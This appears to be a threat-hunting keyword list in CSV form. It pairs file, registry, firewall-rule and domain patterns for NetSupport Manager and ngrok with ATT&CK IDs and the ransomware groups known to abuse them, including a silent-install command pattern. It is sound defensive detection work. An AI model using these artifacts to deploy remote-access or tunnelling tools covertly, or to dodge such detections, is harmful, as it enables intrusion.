"*\PCICTL\ConfigList\Standard\UI\*",".{0,1000}\\PCICTL\\ConfigList\\Standard\\UI\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\pcictlui.exe*",".{0,1000}\\pcictlui\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\PCIDEPLY.exe*",".{0,1000}\\PCIDEPLY\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\PCINSSCD.exe*",".{0,1000}\\PCINSSCD\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\PCINSSUI.exe*",".{0,1000}\\PCINSSUI\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\PCISCRUI.exe*",".{0,1000}\\PCISCRUI\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\PCIShellExt64.dll*",".{0,1000}\\PCIShellExt64\.dll.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Scripts\CreateRegKey.scp*",".{0,1000}\\Scripts\\CreateRegKey\.scp.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Scripts\DirLst.log*",".{0,1000}\\Scripts\\DirLst\.log.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Scripts\DirLst.scp*",".{0,1000}\\Scripts\\DirLst\.scp.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Scripts\DrvSize.scp*",".{0,1000}\\Scripts\\DrvSize\.scp.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Scripts\writetofile.scp*",".{0,1000}\\Scripts\\writetofile\.scp.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Software\NetSupport Ltd\*",".{0,1000}\\Software\\NetSupport\sLtd\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\Start Menu\Programs\NetSupport*",".{0,1000}\\Start\sMenu\\Programs\\NetSupport.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Win7Taskbar.dll*",".{0,1000}\\Win7Taskbar\.dll.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*_NetSupport_NetSupport Manager_*",".{0,1000}_NetSupport_NetSupport\sManager_.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*=NetSupport Client_deleteme*",".{0,1000}\=NetSupport\sClient_deleteme.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*>NetSupport Client Application</*",".{0,1000}\>NetSupport\sClient\sApplication\<\/.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>NETSUPPORT LTD.</*",".{0,1000}\>NETSUPPORT\sLTD\.\<\/.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>NetSupport Ltd</*",".{0,1000}\>NetSupport\sLtd\<\/.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>NetSupport Remote Control</*",".{0,1000}\>NetSupport\sRemote\sControl\<\/.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>NetSupport remote Control</*",".{0,1000}\>NetSupport\sremote\sControl\<\/.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*activate.netsupportsoftware.com*",".{0,1000}activate\.netsupportsoftware\.com.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Company'>NetSupport Ltd</*",".{0,1000}Company\'\>NetSupport\sLtd\<\/.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*geo.netsupportsoftware.com*",".{0,1000}geo\.netsupportsoftware\.com.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*HKCR\nsm\shell\open\command*",".{0,1000}HKCR\\nsm\\shell\\open\\command.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*HKCR\NSScriptFile\*",".{0,1000}HKCR\\NSScriptFile\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*HKLM\System\CurrentControlSet\Services\Client32*",".{0,1000}HKLM\\System\\CurrentControlSet\\Services\\Client32.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*https://nsproducts.azureedge.net/nsm-*/NetSupport*",".{0,1000}https\:\/\/nsproducts\.azureedge\.net\/nsm\-.{0,1000}\/NetSupport.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*NetSupport Audio Sample Source Filter*",".{0,1000}NetSupport\sAudio\sSample\sSource\sFilter.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*NetSupport Bitmap Source Filter*",".{0,1000}NetSupport\sBitmap\sSource\sFilter.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*NetSupport Manager -- Installation *",".{0,1000}NetSupport\sManager\s\-\-\sInstallation\s.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*NetSupport Manager (1).msi*",".{0,1000}NetSupport\sManager\s\(1\)\.msi.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*NetSupport Manager.msi*",".{0,1000}NetSupport\sManager\.msi.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*NetSupport%20Manager.msi*",".{0,1000}NetSupport\%20Manager\.msi.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*netsupport*\PCISA.exe*",".{0,1000}netsupport.{0,1000}\\PCISA\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*netsupport*\runscrip.exe*",".{0,1000}netsupport.{0,1000}\\runscrip\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*netsupport*\supporttool.exe*",".{0,1000}netsupport.{0,1000}\\supporttool\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*NetSupport_Client_machine.adml*",".{0,1000}NetSupport_Client_machine\.adml.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*NetSupport_Control_Machine.adml*",".{0,1000}NetSupport_Control_Machine\.adml.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*NSM_Control_Machine.adm*",".{0,1000}NSM_Control_Machine\.adm.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*pcicfgui_client.exe*\Client32.ini*",".{0,1000}pcicfgui_client\.exe.{0,1000}\\Client32\.ini.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*program files*\netsupport\*",".{0,1000}program\sfiles.{0,1000}\\netsupport\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'RuleName'>NetSupport Client<*",".{0,1000}\'RuleName\'\>NetSupport\sClient\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A"
"*'RuleName'>NetSupport Control<*",".{0,1000}\'RuleName\'\>NetSupport\sControl\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A"
"*'RuleName'>NetSupport Deploy<*",".{0,1000}\'RuleName\'\>NetSupport\sDeploy\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A"
"*'RuleName'>NetSupport Gateway<*",".{0,1000}\'RuleName\'\>NetSupport\sGateway\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A"
"*'RuleName'>NetSupport Group Leader<*",".{0,1000}\'RuleName\'\>NetSupport\sGroup\sLeader\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A"
"*'RuleName'>NetSupport Run Script<*",".{0,1000}\'RuleName\'\>NetSupport\sRun\sScript\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A"
"*'RuleName'>NetSupport Script Editor<*",".{0,1000}\'RuleName\'\>NetSupport\sScript\sEditor\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A"
"*'RuleName'>NetSupport Scripting Agent<*",".{0,1000}\'RuleName\'\>NetSupport\sScripting\sAgent\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A"
"*'RuleName'>NetSupport Tech Console<*",".{0,1000}\'RuleName\'\>NetSupport\sTech\sConsole\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A"
"*'RuleName'>NetSupport Tutor<*",".{0,1000}\'RuleName\'\>NetSupport\sTutor\<.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","firewall rules name","10","10","N/A","N/A","N/A","N/A"
"*WindowsStoreAppExporter.exe*",".{0,1000}WindowsStoreAppExporter\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*winst64.exe* /q /q /ex /i*",".{0,1000}winst64\.exe.{0,1000}\s\/q\s\/q\s\/ex\s\/i.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused  by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.ngrok.me*",".{0,1000}\.ngrok\.me.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*/ngrok.exe*",".{0,1000}\/ngrok\.exe.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*/ngrok.git*",".{0,1000}\/ngrok\.git.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*/ngrok.go*",".{0,1000}\/ngrok\.go.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*/ngrok.log*",".{0,1000}\/ngrok\.log.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*/ngrokd.go*",".{0,1000}\/ngrokd\.go.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","1","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*/ngrokroot.crt*",".{0,1000}\/ngrokroot\.crt.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*\ngrok.exe*",".{0,1000}\\ngrok\.exe.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*\ngrok.go*",".{0,1000}\\ngrok\.go.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
"*\ngrok.log*",".{0,1000}\\ngrok\.log.{0,1000}","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002	","TA0011 - TA0010 - TA0005","N/A","Akira - BlackCat - Karakurt - Scattered Spider* - LockBit - Fox Kitten - LazyScripter - ","C2","https://github.com/inconshreveable/ngrok","1","0","N/A","N/A","10","10","24110","4263","2024-04-26T18:11:18Z","2013-03-20T09:37:43Z"
